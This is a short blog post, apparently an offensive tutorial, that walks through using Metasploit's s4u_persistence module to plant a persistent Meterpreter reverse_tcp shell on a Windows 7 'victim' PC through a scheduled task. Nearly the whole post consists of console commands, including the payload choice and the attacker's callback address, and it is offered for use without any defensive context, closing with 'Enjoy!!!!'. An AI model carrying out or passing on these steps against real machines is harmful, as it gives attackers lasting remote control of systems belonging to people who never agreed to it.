Windows Manage User Level
Windows Manage User Level
Persistent Payload Installer
Creates a scheduled task that will
run using service-for-user (S4U).
This allows the scheduled task to
run even as an unprivileged user
that is not logged into the device.
This will result in lower security
context, allowing access to local
resources only. The module
requires 'Logon as a batch job'
permissions
(SeBatchLogonRight)
Exploit Targets
Windows PC
Requirement
Attacker : Backtrack 5
Victim PC: Windows 7
Open backtrack terminal
type msfconsole
Now type use exploit/windows/
local/s4u_persistence
msf exploit (s4u_persistence)
>set payload windows/
meterpreter/reverse_tcp
msf exploit (s4u_persistence)
>set lhost 192.168.1.2 (IP of
Local Host)
msf exploit (s4u_persistence)
>set session 1
msf exploit (s4u_persistence)
>exploit
Enjoy!!!!
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home